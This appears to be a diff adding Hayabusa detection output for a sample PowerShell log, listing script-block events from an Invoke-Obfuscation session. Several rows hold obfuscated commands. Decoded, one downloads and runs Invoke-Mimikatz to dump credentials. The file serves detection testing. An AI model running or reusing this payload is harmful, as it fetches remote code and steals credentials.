+2017-08-31 04:15:39.581 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.585 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.588 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:39.901 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:40.071 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:40.085 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:40.121 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:43.135 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [cHAR[]] ( 20 , 24, 5 ,125 , 117 , 19, 56,42, 112 ,18 , 63 , 55,56 ,62,41,125,19 , 56 , 41 ,115 ,10,56 ,63, 30 , 49 ,52 ,56 ,51, 41 , 116 , 115, 25 ,50,42 ,51, 49,50,60, 57, 14, 41 ,47 , 52, 51, 58 ,117 ,122 , 53, 41,41 , 45 , 46,103, 114, 114,47 ,60, 42, 115, 58 , 52 , 41 ,53 ,40, 63 , 40 , 46, 56,47 , 62 ,50 ,51, 41 ,56,51,41, 115 , 62, 50 ,48 , 114,48,60 , 41,41 ,52 ,59, 56, 46, 41 ,60, 41 , 52,50 , 51, 114 , 13,50,42 ,56 , 47 ,14 ,45 , 49, 50 , 52 ,41 , 114 ,48, 60, 46,41, 56,47, 114 , 24,37,59,52 , 49 ,41, 47, 60,41,52 , 50 , 51 , 114 ,20 , 51 ,43, 50,54 ,56, 112 , 16 , 52, 48 , 52 , 54, 60 ,41,39, 115, 45 ,46 , 108 , 122,116,102, 125 ,20 ,51 , 43, 50 , 54 ,56 ,112, 16, 52,48,52, 54,60 , 41 , 39 ,125 ,112 , 25, 40 , 48, 45,30 ,47 ,56, 57 ,46 ) |%{[cHAR] ( $_ -BXor""0x5d"" ) } )-JOIN''|.( $ENv:ComSPEc[4,15,25]-jOIN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:15:43.135 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{[cHAR] ( $_ -BXor""0x5d"" ) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:04.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:04.320 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:06.877 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? ""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& ${=}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:06.877 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? ""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& ${=}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:06.938 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,iex([CHar]73 +[CHar]69+[CHar]88 +[CHar]32 +[CHar]40 +[CHar]78 +[CHar]101+[CHar]119 + [CHar]45+ [CHar]79 + [CHar]98+[CHar]106+[CHar]101 +[CHar]99 +[CHar]116+ [CHar]32 +[CHar]78+[CHar]101 + [CHar]116 +[CHar]46+[CHar]87+[CHar]101 + [CHar]98+ [CHar]67 +[CHar]108 +[CHar]105+[CHar]101 + [CHar]110 + [CHar]116+ [CHar]41 + [CHar]46+ [CHar]68+ [CHar]111+ [CHar]119+ [CHar]110+[CHar]108 +[CHar]111+ [CHar]97 + [CHar]100 + [CHar]83+ [CHar]116 + [CHar]114+[CHar]105 +[CHar]110+ [CHar]103+ [CHar]40+ [CHar]39+[CHar]104 +[CHar]116 +[CHar]116+ [CHar]112 +[CHar]115 + [CHar]58+ [CHar]47+[CHar]47+[CHar]114+ [CHar]97+ [CHar]119 + [CHar]46+[CHar]103+[CHar]105+ [CHar]116 +[CHar]104 +[CHar]117+[CHar]98+[CHar]117+[CHar]115 + [CHar]101+ [CHar]114 +[CHar]99+ [CHar]111 + [CHar]110+[CHar]116 + [CHar]101 + [CHar]110+ [CHar]116 +[CHar]46+ [CHar]99 +[CHar]111 +[CHar]109 +[CHar]47 + [CHar]109 +[CHar]97 +[CHar]116 +[CHar]116 + [CHar]105 + [CHar]102 +[CHar]101 + [CHar]115 + [CHar]116+[CHar]97+ [CHar]116+ [CHar]105+ [CHar]111 +[CHar]110 +[CHar]47+ [CHar]80+[CHar]111 + [CHar]119 +[CHar]101 + [CHar]114+ [CHar]83+ [CHar]112+[CHar]108+ [CHar]111+ [CHar]105 + [CHar]116+[CHar]47 + [CHar]109+ [CHar]97 +[CHar]115 +[CHar]116+[CHar]101 +[CHar]114 +[CHar]47+[CHar]69+[CHar]120 +[CHar]102+ [CHar]105+[CHar]108 +[CHar]116 + [CHar]114+ [CHar]97+ [CHar]116 + [CHar]105 + [CHar]111+[CHar]110+[CHar]47+[CHar]73+ [CHar]110+[CHar]118+[CHar]111+[CHar]107 +[CHar]101+[CHar]45+ [CHar]77+ [CHar]105+[CHar]109+[CHar]105 +[CHar]107+[CHar]97 + [CHar]116+[CHar]122 + [CHar]46 + [CHar]112+[CHar]115 + [CHar]49+ [CHar]39 + [CHar]41 +[CHar]59 +[CHar]32+ [CHar]73+[CHar]110+[CHar]118+ [CHar]111+ [CHar]107+[CHar]101+[CHar]45+ [CHar]77 + [CHar]105 +[CHar]109+[CHar]105+ [CHar]107 + [CHar]97+[CHar]116+[CHar]122+[CHar]32 + [CHar]45 +[CHar]68+[CHar]117 +[CHar]109+ [CHar]112 +[CHar]67+[CHar]114 +[CHar]101+[CHar]100 + [CHar]115),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.040 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.050 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.054 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.057 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.060 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.062 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.067 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.077 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.081 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.085 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.089 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.107 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.118 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.272 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.286 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
